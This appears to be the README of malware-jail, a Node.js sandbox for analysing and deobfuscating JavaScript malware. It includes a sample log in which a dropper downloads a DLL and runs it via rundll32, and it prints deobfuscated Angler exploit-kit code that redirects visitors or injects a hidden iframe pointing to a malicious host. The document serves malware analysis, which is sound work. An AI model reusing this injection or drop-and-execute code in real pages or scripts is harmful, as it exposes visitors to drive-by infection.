Sandbox for semi-automatic JavaScript malware analysis, deobfuscation and payload extraction. Written for Node.js.
malware-jail is written for Node's 'vm' sandbox. It currently implements the WScript (Windows Scripting Host) context in env/wscript.js, at least the part frequently used by malware. The Internet browser context is partially implemented in env/browser.js.
Runs on any operating system, tested on Linux (Node v4.2.1).
malware-jail requires the minimist, xmlhttprequest, entities and iconv-lite npm packages; you may install them with:
npm install
or
npm install minimist xmlhttprequest entities iconv-lite
Be careful when working with real malware. Malware that is aware of this sandbox may try to escape and harm your PC. It is recommended that you run it either from an unprivileged Linux account or from within a virtualized Windows machine. The Angler files in the malware folder are NOT disarmed.
bash@linux# node jailme.js -h -b list
20 Feb 21:16:09 - Malware sandbox ver. 0.4
20 Feb 21:16:09 - ------------------------
20 Feb 21:16:09 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-o ofile] [-b id] \
20 Feb 21:16:09 - [-s odir] [--down=y] [malware1 [malware2] .. ]
20 Feb 21:16:09 - -e ifile ... js that simulates specific environment
20 Feb 21:16:09 - -o ofile ... name of the file where sandbox shall be dumped at the end
20 Feb 21:16:09 - -s odir ... output directory for generated files (malware payload)
20 Feb 21:16:09 - -b id ... browser type, use -b list for possible values
20 Feb 21:16:09 - --down=y ... use http request to download malware components automatically
20 Feb 21:16:09 - malware ... js with the malware code
20 Feb 21:16:09 - If no arguments are specified the default values are taken from config.json
20 Feb 21:16:09 - Possible -b values: [ 'IE11_W10', 'IE8', 'iPhone', 'Firefox', 'Chrome' ]
In the examples folder you may find a deactivated malware file. Run the analysis with:
node jailme.js malware/example.js
or just simply:
node jailme.js
Internet browser based malware can be tested with:
node jailme.js -b IE11_W10 malware/example_browser.js
The malware/example.js is the default malware file configured in config.json.
After analysis the complete sandbox context is dumped to the file 'sandbox_dump_after.json'. There you may find:
- _eval_calls - array of the arguments of all eval() calls. Useful if eval() is used for deobfuscation.
- _wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved to the output/ directory too.
- _wscript_urls - all URLs that the malware intended to GET or POST.
- _wscript_objects - WScript or ActiveX objects created.
'sandbox_dump_after.json' uses JSONPath, implemented by JSON-js/cycle.js, to save duplicated or cyclic references to the same object.
bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 - => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 - => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 - => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json
In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf.
Download and extract the Angler EK page from the pcap file at ANGLER EK SENDS CRYPTOWALL into malware/angler_full.html.
Strip the non-Angler part and save it as malware/angler_stripped.html.
Remove the <script> tags and convert the required <div> tags into:
document._addElementById(id, content);
and save the result as malware/angler.js.
Run the analysis:
node jailme.js malware/angler.js
Optionally capture the output into angler_output.txt:
node jailme.js malware/angler.js > angler_output.txt
Deobfuscating the final stage:
function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(zfxhYOGvfrlHUNJrZufQnWPtohkYAQEEdV);
        if (typeof window["v_bcd50d9482665cd4e129a272c76799e6"] == "undefined") {
            window["v_bcd50d9482665cd4e129a272c76799e6"] = 1;
            var YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr = (DfPJmMLOnxPanSoeHQuOrDdSoCPJGAaRhYURtgyUD() && CCtJDLZQbieboJvsIyatBMZhUvTpzaQcyCXR());
            var YBMlxOjmRXjqriuNuiEQPAJsQuuwPLiQW = !YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var rfddjrtkllJefuAgPfwCNdpgltcAYetudMCia = -1;
            var NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS = "http://beladonna33.ga/052F";
            if (hgvANEpEuWeKcGvvwzyKQIhEoKIHuYnyaOtvVW() && rfddjrtkllJefuAgPfwCNdpgltcAYetudMCia == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS)
                } else {
                    window.location = NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS;
                    document.location = NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS
                }
            } else {
                if ((YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr && !YBMlxOjmRXjqriuNuiEQPAJsQuuwPLiQW && !hgvANEpEuWeKcGvvwzyKQIhEoKIHuYnyaOtvVW())) {
                    var blDiNORLBvDHjFRqgxXSMVgnfhriGmw = "<div style=\"position:absolute;left:-2808px;\"><iframe width=\"27px\" src=\"" + NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS + "\" height=\"27px\"></iframe></div>";
                    var wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL = document.getElementsByTagName("div");
                    if (wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + blDiNORLBvDHjFRqgxXSMVgnfhriGmw
                    } else {
                        var dl_name = wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL.length;
                        var eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc = Math.floor((dl_name / 2));
                        wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL[eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc].innerHTML = wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL[eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc].innerHTML + blDiNORLBvDHjFRqgxXSMVgnfhriGmw
                    }
                }
            }
        }
        OncYaaSjwrEWhyHWevaHtkypMUSZxnIrtIK()
    }
}
The MIT License (MIT)
Copyright (c) 2016 Hynek Petrak
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.